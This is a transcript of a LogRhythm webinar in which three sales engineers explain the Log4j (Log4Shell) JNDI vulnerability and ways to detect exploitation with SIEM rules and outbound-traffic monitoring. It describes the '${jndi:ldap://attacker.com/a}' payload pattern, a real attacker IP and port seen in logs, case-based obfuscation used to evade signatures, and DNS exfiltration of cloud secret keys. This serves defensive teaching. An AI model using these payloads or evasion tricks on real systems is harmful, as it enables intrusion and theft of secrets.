My name is Daniel Crossley. I'm the Sales Engineering Manager at LogRhythm. And with me today, I have my friends and colleagues. I have Daniel Chambers and Ashok. And we wanted to just spend a little bit of time this morning talking about this whole Log4J thing. So like I said, I'm the Sales Engineering Manager for LogRhythm based out of the UK. Do you want to say a quick hello to everyone, Ashok, and a quick introduction?
Yeah, my name is Ashok. I work as a principal sales engineer for LogRhythm. I'm almost at LogRhythm for almost like 6 years now.
Great. And you're based out of Dubai?
Yeah, I'm based out of Dubai.
All right. And how about you, Daniel? Where are you based and what do you do?
Yeah, so I'm also based out of our Dubai office. I'm a Copilot analytic consultant, but have previously worked professional services for LogRhythm for just over 6 years now. So yeah, plenty of working with customers on a weekly basis to work around use cases for detection. So we'll talk about that later.
Great. Okay, so let's talk about this Log4j thing. So basically, went to sleep on a Friday, woke up on a Monday, and then suddenly it's all over the internet, right? So what is it? Let's talk about what Log4j is, first of all, talk about the problem, and then we'll talk about how LogRhythm customers could potentially use LogRhythm SIEM to detect this. Some ideas for detection, and I think that's important. Now, it is also worth noting that LogRhythm as a product, we have put out some advisories for LogRhythm customers that is available on the community's site. Okay, but now let's talk about what it actually is. Well, what is Log4j? So Log4j is actually a logging library for Java. So Java is a programming language. And when you, as a developer, write code, that code's going to be doing something. And as a best practice, you want to be logging what you're doing. And there's many reasons for that, like you want to check that the application is operating properly. There's debugging as well. But what a logging library like Log4j will do is it will abstract some of the functionalities. So when you write to a log file, you need to do things like dealing with files. You need to deal with the rollover of the files. You need to deal with the naming of the files and all that kind of stuff. And Log4j is just a really easy way for developers to abstract that. So all they need to do is import this library, instantiate an instance of a Log4j object, and then use that to write the logs for their code. Okay, so that's all well and good in theory until you have a problem where the parsing engine included in Log4j can actually do some things that were unintended. So what is it that Log4j does, Ashok, that we don't want it to do? What is that?
Yeah, so basically what it does is it just tries to do some sort of lookups. So it can use the the Java naming and directory interface. That's the the full form of JNDI. It could do basically lookups. To for example, to an LDAP looking for information such as names, full name, kind of things like that. So it's not just just the LDAP query, right? So it can interact with other protocols also. For example, it can interact with DNS protocol. It can interact with RMI. It's basically called as registry method invocation, right? So it could interact with different protocols out over there. I mean, in different forms of it using the JNDI API. So that is what basically Log4j does.
So it interprets potential commands. So going back to what I said, if you're a developer and you want to write something to a log file saying the application did this, you would send that string to the Log4j object. Now, the problem is when you put a command in that string, that command will get executed by Log4j. So just tell us, Daniel, what is JNDI? Just clarify that again, please.
Yeah, so what happens in the log file is that when it gets parsed through, it looks for any addresses in the format similar to a HTTP format. It looks for JNDI colon and then the command, and after that command there could be a number of different ways of getting more information. So for example, your log message may contain D Crosley in the log message, and what the JNDI can go and do is do a lookup to your Active Directory and get your details of who you are, who your manager is, where your location is, and add those into the log file to enrich it and give it more information. Now, I personally, I've never really seen that used a huge amount, and it's one of those things that has been found to have the vulnerability, which it will just go and execute whatever it finds. There's no checking and it will even go and execute extra libraries that it may need to access those queries, and it will go off and do those. So that's fundamentally where the vulnerability is in this JNDI portion of Log4j, as mentioned.
Yeah, so JNDI, you know what? Honestly, I'd never even heard of JNDI before yesterday. So what we're talking about here is, as you said, it's a remote code execution type of vulnerability. So the Log4j processor will execute that code, and if I'm not mistaken, correct me if I'm wrong here, it's got a CVSS score of a perfect 10. So let's look at a detailed example of how this would actually be exploited, because it's a vulnerability and vulnerabilities get exploited. So what are we looking at here? So we're looking at a snippet of Java code which came from this Lunasec blog site, and this is an example of how this vulnerability could be exploited. So what we're doing here is we are basically what we're doing, we are taking the X API version value from a request. So it could be a HTTP request. So let's say an attacker, right, has connected to a HTTP server, and what they've done is, or what would happen then is, if this code was on the server side, the X API version, which is a value that is sent to the HTTP server, would be interpreted, would actually be logged. So that the bottom line there where it says log.info requested API version, this is where we're sending that API version value to our logging library. Remember I said before, you instantiate a logging library, and then all you need to do is call that in order to log the things that you want to log. In this case, we are logging the API version. Okay, so does that make sense to you guys? Okay.
Yeah.
So
I
where
think,
does this go wrong? So are you going to say something, Daniel?
I was going to say, just to add on to this, I think we'll come on to it later, but it's anything that can be logged as well. So it's not necessarily just the API version that we're talking about here as an option. It could be the user agent. It could be the URL. Anything that would potentially hit a log file could execute.
Yeah, so I got something to add over here. So basically, from my perspective, most of the time, what gets logged on a log file is all going to be the HTTP headers, right? So you will be finding user agent, for example. You will be finding the URL information, the source IP addresses, right? What type of request it is, right? So, referrer header. So this is all what most of the time gets generally logged on a log file, right? So ideally here, what we are looking at is over here is a get request, right? Most of the time post requests are not logged, right? So the values on the HTTP headers, there are many, there are 100+ headers, right? So it could be on any one of them. The variables can be passed on, right? So that whatever gets logged, like what Daniel said.
So it's basically anything that can be sent, and anything that's logged is potentially vulnerable. It's a potential avenue of exploiting this, right? So let's break this down a little bit more. So let's walk through this diagram, okay? So start with number one, right? I'm the user down the bottom there, right? I make a request, okay, to a website, right? So again, a HTTP request. However, as according to the code, what I do is I give it a specially formatted string. Okay, in this case, it's there, the $JNDI $LDAP / attacker.com/A. Okay, and that's hosted by our bad guy out there on the internet that's serving malware. So this API version string then gets logged, right? So we've got our web server hosted up there in the cloud, right, which happens to be running Log4j. And what this then does, it takes that log, you can see at the very top there, it takes the value of our XAPI version, and then it sends that to our Log4j instance, which then executes that. And then that would, what would happen then is an LDAP query would be made to the attacker.com, which could be hosting malware. From that point onwards, malware could be retrieved. So, tell us, Ashok, what could happen from point 3 onwards? Like, what are the kinds of things that could happen there?
So basically what happens is there will be an LDAP query which will be done from so to just explain it in a very easy way, as soon as the web server gets this so-and-so query, like with dollar open braces, JNDI, LDAP query. So the web server, the Log4j, will make a JNDI lookup, right? So the JNDI will call an LDAP. The LDAP is generally works on port number 389, but that doesn't matter. You can always, the protocol is going to be on LDAP. But if you look at the port number can be not on 389, it can be on 443, or it can be on any port it can be. So what it does is it makes an LDAP query, right? So the LDAP query, when it is made to the vulnerable server will pass on the payload back to the victim server, right? So the attacker will pass on the payload back to, that's the second stage of the payload. I mean, if you look at it, the first query goes to the attacker, the payload will be dropped, right? And then the attacker's machine, right, it makes another one query back to the vulnerable server, right? And it'll get the full payload, and then it'll execute it. So that's how it works.
So what we're talking about is that server hosted up there in the cloud will execute malicious code, and that code could be malware. Right. Now that I think about it, now that I look at this diagram, actually, the user down the bottom there should be the attacker as well, because they're the one that's trying to exploit the server. So actually, the attacker owns both of those, right? Now, Daniel, tell me let's say from an analytics perspective, if that's an Apache server and we're ingesting the Apache.log file into a SIEM, or if we're monitoring the logs of that server, I mean, what are some easy ways that you could actually detect an attempt to exploit this? What do you think?
So there's a few approaches to it, and with everything, it's definitely worth looking at all of them. So the first one I would look at is obviously your log analysis. So looking at your web server logs and server logs within your published systems, but to be fair, all of your systems really, to make sure that you're looking for anything around JNDI, LDAP. If you're hosting a web server, you're typically not going to expect to see these unless you've implemented them yourself. So if you know that they're not being used, then looking for those within log files, and that's where we have some detection rules already around on our community for looking for JNDI or LDAP or things like that around your log files on those systems. The other thing as well is to look for the activity that is triggering it. Now, typically, a lot of these are going to be around web servers. 99, if not 100% of the legitimate traffic of that web server is going to be inbound from the internet. So you're going to have people browsing the web, accessing your website, and it's going to be replying to those requests. Not very often, unless it is, initiated by a user that would be administering the server, would that web server be making an outbound connection. And this is what it's going to be doing. It's initiating its own outbound connection to a website. Adding on to that, looking for LDAP, so looking for outbound connections from your web server, especially for protocols that you would not expect. So LDAP, DNS, things like that, looking for it going outbound. That's definitely something you should be looking at, but also not focusing purely on your web servers. These could be on any of your systems. Any system that runs Java that potentially has Log4j implemented as part of that is there and is potentially vulnerable for this, as well as different parts of your website. So you may go and run a vulnerability scan from many of the vendors of vulnerability scanners, dare say, if not all at this stage, will have scans looking for this. However, if you run that on your homepage versus a logged in version of your site, then that might be something different. There may be somewhere else that it is able to be executed from on your site. So that really the only way for seeing if you are vulnerable, I would recommend running on server scans. And I believe there are tools out there for that as well, to look for these libraries, as well as libraries nested within different packages as well. But absolutely, we can look for, as I said, starting off looking for the logs and then looking for suspicious outbound connectivity from those systems.
So tell me, Daniel, if an organization hasn't onboarded their Apache.log file into their SIEM, how valuable do you think a next-gen firewall log would be in attempting to detect this?
I think next-gen firewalls, again, having things like IDS, IPS modules built in. I've seen with some of my customers that they are picking those up and they are blocking those requests coming in. If you have things like web application firewalls sitting in front of your web servers, then that's also going to be sitting there and hopefully making sure that your signature databases are up to date. As you said, this happened Friday. We've kind of known about it. I think 6 months ago there was initial talk about a way of doing this, but it's actually been found now in the wild. And now that it's got a lot more press, there's a lot more people trying it. And it's, as you said, it's not the most sophisticated attack that you need to do. So yeah, web application firewalls, next-gen firewalls are a good step as long as they're updated and signatures are updated as well.
I guess the other thing you could do with next-gen firewall logs, now that I think about it, is you could do an element of threat hunting where you're looking at least most occurring applications from specific servers which you think could be vulnerable. I think that would be an idea that you could, in the absence of any other kind of detection. I think that there is a possibility there. So tell me, Ashok, does it have to contain the JNDI characters in order for this attack to work?
Yes, it has to have this value for this attack to work. But if you're looking at it from a perspective, it is a two-staged payload, right? So if you look at from the diagram what you have, so when you make an initial JND LDAP attacker, so what it is doing basically is the victim server, right? It is going and first initiating an LDAP query. You see that attacker.com/A.
Yeah.
Right. So that A is the payload, which it is downloading from the attacker's machine.
Yeah.
So you get that payload, and then the payload gets executed next. Right. So if you're looking at it, it's a two-staged attack over here. So the payload could altogether connect on a different port. So for example, the payload could be downloaded from attacker 1, okay, and after it gets executed, it could get connected to attacker 2. So so you will not be able to. So both of them will not have any relation, right? So but definitely you need to, when you're looking at from a log message perspective, you have to look for the JNDI, right? And then also possibly if you can go ahead and decode that base 64 encoded. I mean, most of the time what we observe from our threat hunting with with existing customer environments and other places, what we found out over here is the payloads are having JNDI, and we are also observing at the moment obfuscation, which is happening for the JNDI payload with lower cases, upper cases, and stuff like that. Like I said, the most important thing over here is you need to. It will be on the GET request, right? Because post requests are not generally logged in by the log file, so it will be there on the GET request. Your primary fields will be, and we are observed until now on referrer fields. We observed on URL fields, and we've been observing on other fields as well, right? So that is something which we need to look at it. But JNDI is a string which will be there.
Right. Okay. So from what I'm getting from what we just talked about, just because you're running a vulnerable version of Log4j doesn't automatically mean you're going to get popped, because there are other controls there as well. Like Daniel mentioned, you've got potential IPS, IDS, WAF as well. And then as Ashok said, it is a two-stage attack as well. So other endpoint types of controls, endpoint security controls, AV, EDR, application whitelisting on those servers will actually prevent that second stage, potentially. But as you said, Ashok, if we think about this from the perspective of detection, and you've said a couple of things. There has to be a GET request, but also that JNDI string has to be there. So very, very easy way that you could detect this, and what you guys have done is literally look for that string in your web your web server logs, right? And then that is a potential attack, right, taking place. However, as you said, Ashok, that could be obfuscated. So let's talk about that for a moment. So tell us more, Ashok, about what you've seen. Okay, first of all, where are you seeing this? Where are you actually seeing this?
Oh, so this comes primarily from IIS logs, or you can, Apache logs, or if you have, for example, a reverse proxy, a web application firewall. These are the primary places which you see this logs which is coming in from where we are picking it up, and you can see the different fields over here. So you can see a URL request. You can see the request coming over user agent, because these all fields are generally logged into a log file. So that is the reason you're seeing the different fields out over here, and the IP address 45. So to explain this, what you are seeing over here is the request equal to get slash a question mark, then X, that's a variable, right? Equals, when it gets executed, what is it saying is, use the JNDI API and do an LDAP query and connect to this location, which is 45.155.205.233 on the port number 12344, right? So, and then what it is doing is basically, after this, once you get connected, so it goes and connects, and then it downloads the payload from there, right? There is a base64 encoded value also, out of this. If it directly allows the command execution, then it does, because it does allow you to do a curl and stuff like that, the base64 encoded. But however, what it is happening over here is the JNDI LDAP / it will basically connect to this so and so port on 12344 and get the payload. Right, and the second one, what you're looking at is basically the attacker is trying to write it into the, he is trying to, for example, you could use burp or any other sort of tool, and you can append this value. You can modify your user agent. Generally your user agent is Mozilla or Chrome or Firefox or anything, right? But here what they're doing is, because they know that the user agent also will get logged into a log file. So they're tampering the user agent with a value where they are saying that, a deobfuscation method where it could allow an attacker to evade. And, for example, if you're going to write a rule in a SIM or an, let's say on an IDS signature, this will bypass it, right? Because you are not seeing a sequence of JNDI, right? You are seeing a dollar, then open braces, double colons, -J. So that is also another way where they could bypass it. So that is what you're seeing, JNDI : and then you're seeing, JNDI : LDAP, and then you're seeing the IP, right? So then the last one is you're seeing the referrer header on the HTTP, right? So you can see that on that, again, lower D AP. So that's how they are trying to obfuscate at the moment. And we've been seeing many more methods as well at the moment. But ideally, the JNDI has to be there.
So just to add to this very quickly, sorry. These IP addresses are IP addresses we've seen attacks coming from. So I wouldn't recommend any listeners trying to punch these in and going to these. These are malicious IPs that we've got on here. So just thought I'd add that disclaimer in.
So that's an IOC. That's an IOC.
So I did a hunt on many customer places, right? I've been working on, right? So almost a lot of places, what we've been observing so far is this one single IP address appears everywhere. Right. And the interesting thing, what I did basically is, so if you look at the number of requests, is going to be very, very minimal. So what I did basically is this exploit was noticed from the date of 9th to 12th. So 9th to 12th is what we are seeing this activity. Before that, we are not seeing any of the JNDI activity which is going on in any of the environments, right? From 9th to until today, we are observing this activity, right? For all the And what we did is, so how also we tried to do it is basically we looked at all the requests basically coming in, which is whatever had this JNDI string. We looked at it and we looked for the outbound connections which was going to that particular IP addresses. So in this particular situation, what we were looking at is 45.155.205.233, right? So if we observe an outbound connection, right? So using LogRhythm, we can differentiate the traffic which is coming in, right, on your firewall. For example, you can say that this is a traffic which is an inbound traffic or is it an outbound traffic. So what we did is we took this particular IP and then we know that, okay, this IP made us a request. Now, what we are doing is also we automated it in a way now to look for the traffic originating from 45.155 making that request. And do we really see an outbound connection now going out to this IP address, right? But so that is how we are looking at it and tying it together now.
It's still, yeah, I mean, but IP-based IOCs, I think there's still value there. Obviously, the value is obviously limited because IP addresses change all the time. But if you're seeing a lot of activity from this single IP address in your region, then it's definitely worthwhile throwing it in there as either a block or an alarm. So tell me, Daniel, so that second example there that we're seeing, right? It's still got the JNDI, and like what we talked about before, it still needs to have the JNDI in order, as far as we're aware anyway, in order for this exploit to work, right? Because that's where the vulnerable component is, right? So JNDI. Now, what with all the dollars and curly braces and colors and dashes, what someone is trying to do, as Ashok said, is obfuscate that so that if you're literally looking for JNDI, that's not going to match, right? Because there's the dollars and braces there. So tell us, Daniel, right, from an analytic perspective, how could you overcome that with the power of regular expressions?
Yeah, so absolutely, we can look at ways of different ways of obfuscating. As you can see in the bottom, you've got lower. The other option of that is also upper. You've got these ways of adding it, so we can look at putting together some form of regex or even a couple of regex queries that would look for that JNDI in the logs and find those. But yeah, there's definitely ways that we can do that with different types of regular expressions, as well as looking at all the different ways of obfuscation. It's not something new. People have written whole PowerShell obfuscation to try and get around being found out on PowerShell. But fundamentally, we can look to try and find a way of viewing it. But if they really want to not be found, then there's those other controls that we need to put in place to check for those other malicious connections, as well as the original one, the original exploitation.
Right. Okay, let's dive into that a little bit. So what are we looking at here? So this is a AIE rule for LogRhythm customers. You'll be very familiar with this. So this is the advanced intelligence engine. This is the correlation engine that sits within the LogRhythm SIEM. So maybe Ashok, could you tell us what we're actually looking at here? What is this going to be triggering on? Because an AIE rule will trigger on a pattern within a log. So what are we looking at here under the primary criteria?
So basically what we are looking at is we are looking at certain set of metadata fields such as user agent, URL, and all the other fields either gets logged into object or object name. So what we are doing is we are looking at this set of metadata fields and we are writing a regular expression in an efficient way for us to go ahead and look at that value which starts with dollar and then that open curly braces. And then we are seeing that after that we wanted to see for : // which is basically LDAP : //, right? If you don't have that, then the the HTTP format could break, right? So that is the reason why we are looking for basically : // right? I mean, so the LDAP format, right? LDAP : //. So what we are looking for is basically with that // which will flag this. And if somebody is even writing a way to bypass it, obfuscate it, this will pick it up actually. Right.
The other thing that is key there as well is that there's a lot of focus on the moment around it being LDAP, but there's also, as we mentioned earlier, the other protocols that are there. So I think one of the other key ones, which I think isn't maybe getting as much kind of noise as it maybe should is DNS, and the other reason for that is Log4j has access to the system variables. So if you are storing anything, there's some practices out there where storing things like AWS secret keys, so accessing AWS or other cloud environments by using API keys. Those API keys are being stored as variables. And if, as part of Log4j, you have access to variables and you have access to a DNS zone by just owning any domain name, you could quite easily start exfiltrating secret or confidential information from a system out via DNS to your environment. And that's not even going to be creating an outbound connection, because it's going to be following your existing DNS. So monitoring your internal DNS for these kind of suspicious outbound connections as well is also a potential way of looking at these as well.
All right. So you're saying someone by exploiting this vulnerability, there is a potential to get access to, say, AWS secret keys. If the Log4j server, so what you're doing there is you're getting the Log4j server to send a DNS request, right, to a server that you own, and you're capturing that, and that will contain the AWS secret key.
Yeah, so putting data in as the part as a subdomain. If we take LogRhythm, for example, if you put some data in front of LogRhythm, if you own obviously LogRhythm.com's DNS zone, which running your own DNS server is pretty straightforward, that request will come to you. Now it's going to come back as a potentially the domain doesn't exist, but we already have that log of whatever is before LogRhythm.com. So by adding, something like an access key, or adding this into something else to be used as an exfiltration tool, it maybe even if it isn't publicly exploitable, it could be, if there's another way of accessing the system, it could be used to exploit an exfil of that point.
And the interesting thing about this, the interesting thing about it is it's not particularly looking for DNS or LDAP, this particular rule is. So it just says anything, we should not see anything inside a URL field or an object field or an object name field. We should not see anything called as a, :/ which starts with a dollar or an open braces, right? So if you have this values getting logged, then yes, obviously this will flag it.
Have you set this up at a customer or a client of yours, either of you guys?
Yeah.
Yes.
And was there many false positives?
From what I've seen, so I've imported these into some customer environments. The ones that I have seen are vulnerability scanners. So obviously there's a lot of people at the moment running vulnerability scans against their environment to see if they are vulnerable. And obviously that is an exclusion that you want to be adding in as soon as it gets imported. And also around things like firewall logs. So I've seen with some customers, I think it was a FortiGate firewall, they had their IDS detection and it was dropped. So at the moment we added the exclusions that, if it's dropped to our edge firewall, at the moment, I'm not going to worry about it, because there's going to be a lot of other areas that you need to focus on immediately to try and patch this, work out what systems are vulnerable, and focus on it. Now, going forward, that may be something you want to look at: who is trying to attack, who is trying to come in, and look at then correlating that with other systems. But at the moment, let's focus on the ones that, as the first step, as the ones that have been allowed in, or looking at the ones that have made it to your firewall logs, and then taking the output of those and working out if those systems are vulnerable or not. And the key for that is, this is Log4j, which is the Java version. I believe there's many ports, log for net, log for PHP, and I don't believe that they are vulnerable. Don't quote me on that, but obviously it's worth checking. It's mainly focused around Log4j, the Java version of it. So, for example, having Log4Net in the environment, even if it's going to an IIS web server and they're using Log4Net, then that isn't vulnerable as far as I understand, but it's worth then checking to make sure that system is patched up to date. They've released, I believe it's 2.15 of Log4j is the patched and fixed version. As far as I understand, there's not a huge amount of other changes in there. So obviously testing it, but getting systems patched is going to be, number one, and then we can start looking at also what else has happened around with AIE rules and searches and other ways of looking at the environment to see, what happened up to that point.
Cool. Okay. Well, look, I think it's almost time to bring this to a close. So have you got any closing thoughts, Ashok?
Well, I mean, if you look at an organization, they could have many servers, right? 1,000+ servers out could be there. Practically patching all the servers, probably identifying those servers itself is going to be very difficult, right? And the services which are running. So probably you might have, in one server, there might be 10 different services running. So 10 different services might be using 10 different ways of logging things. So it's going to be very, very difficult to find each of the vendor and getting it patched. So my one advice or one thing what I would think of it is to block all the outbound connections from the servers and allow only the trusted IPs and the trusted ports. I mean, your organization does not need to have outbound connections. I mean, if you look at probably 1% to 2% is what needs an outbound connection. So for example, you log into an antivirus server and you type google.com, the google.com technically works on that server on most of the organizations. So you have to drop all your outbound connections to the internet, right? And you just allow, for example, DNS traffic to your service provider, configure it as a forwarder. Don't make your DNS server as recursive, right? You can just configure it as a forwarder to your service provider DNS server. You can, get your antivirus updates directly from the, your antivirus vendor, right? For example, LogRhythm knowledge base updates. You LogRhythm server just need access only to knowledge base updates of LogRhythm. It does not need any more access on the internet, right? So you got to limit that access. If you limit it, today you have this so-and-so CVE version 4488 or 44228 or whatever it is being released. Tomorrow you'll have another CVE. But ideally, what will happen? What will happen in the future is if you block all your outbound connections from your server, no one can exploit your organization very easily. Remote code execution is not going to happen because when an attacker compromises a server, he needs to drop a payload on your server, which has to dial back to the attacker. When there is no internet connection, it can never dial back. So it is not going to work. I think, instead of, I'm not saying that you should not patch, but what I'm saying is as a quick risk mitigation, what you could do is you can just go ahead and block all your outbound connections in the, only to the trusted servers is what all you should allow to. Other than that, you should block everything. This will help you not on this attack, any attacks on the future as well.
Very, very broad brush approach there. I think definitely effective. Might not be so easier said than done, I think, in some environments, but definitely something to think about, and good advice for the future. How about you, Daniel? Have you got any closing remarks?
Yeah, I think obviously Ashok made a very good point there. I think the other thing to remember is, there's something like 3 billion devices that run Java, right? And where a lot of the focus is on servers, but switches, routers, firewalls, all of the any networking devices, endpoints, workstations, all of these have the potential to be running Java, running Log4j, and could potentially be at a point in your network where they are, there's traffic going out. So don't look at this rule is triggered, but it's coming from, we're seeing outbound connections from a switch. Well, that could be, a switch, a printer, anything really that runs Java could potentially have this vulnerability sat inside it. Not to make you not be able to sleep at night, but it's there's a lot of focus on servers, but and obviously that's where a lot of the crown jewels sit. But there's other areas to focus on as well once you got the important bit secured.
Great. All right, gentlemen, I think that brings us to the end of our time. I found a very insightful conversation here. Thank you very much for your input. And for anyone watching, thank you very much as well. See you next time.
Yeah. Thank you.
Thanks, Dan. Thank you, guys. Bye.